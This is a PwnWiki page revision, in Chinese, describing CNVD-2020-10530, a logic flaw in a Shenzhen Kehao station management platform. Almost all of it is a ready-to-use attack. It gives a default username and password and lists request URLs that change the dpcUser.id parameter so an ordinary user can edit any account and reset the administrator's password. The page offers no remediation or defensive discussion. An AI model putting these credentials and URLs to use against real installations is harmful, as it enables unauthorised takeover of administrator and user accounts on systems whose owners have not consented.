Difference between revisions of "CNVD-2020-10530 深圳市科皓信息技術有限公司 測站綜合管理平台 邏輯缺陷漏洞"
From PwnWiki
(Created page with "<languages /> <translate> ==前提條件== </translate> <translate> 該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有...") |
(Marked this version for translation) |
||
| Line 1: | Line 1: | ||
<languages /> | <languages /> | ||
<translate> | <translate> | ||
| − | ==前提條件== | + | ==前提條件== <!--T:1--> |
</translate> | </translate> | ||
<translate> | <translate> | ||
| + | <!--T:2--> | ||
該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有用戶(包括管理員)的密碼。 | 該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有用戶(包括管理員)的密碼。 | ||
</translate> | </translate> | ||
| Line 11: | Line 12: | ||
<translate> | <translate> | ||
| − | ==默認用戶信息== | + | ==默認用戶信息== <!--T:3--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 20: | Line 21: | ||
<translate> | <translate> | ||
| − | ==重置Admin密碼== | + | ==重置Admin密碼== <!--T:4--> |
</translate> | </translate> | ||
<pre> | <pre> | ||
| Line 27: | Line 28: | ||
<translate> | <translate> | ||
| + | <!--T:5--> | ||
修改dpcUser.id參數的值可以編輯任意用戶,其中可以對任意用戶進行重置密碼,如: | 修改dpcUser.id參數的值可以編輯任意用戶,其中可以對任意用戶進行重置密碼,如: | ||
</translate> | </translate> | ||
Latest revision as of 21:39, 8 July 2021
前提條件
該漏洞需要普通用戶身份登錄平台,登錄平台後可以以普通用戶的權限重置所有用戶(包括管理員)的密碼。
https://<target>/dpc/
默認用戶信息
cs cs123456
重置Admin密碼
https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=1
修改dpcUser.id參數的值可以編輯任意用戶,其中可以對任意用戶進行重置密碼,如:
https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=2
https://<target>/dpc/dpcUser!preEdit.action?dpcUser.id=3
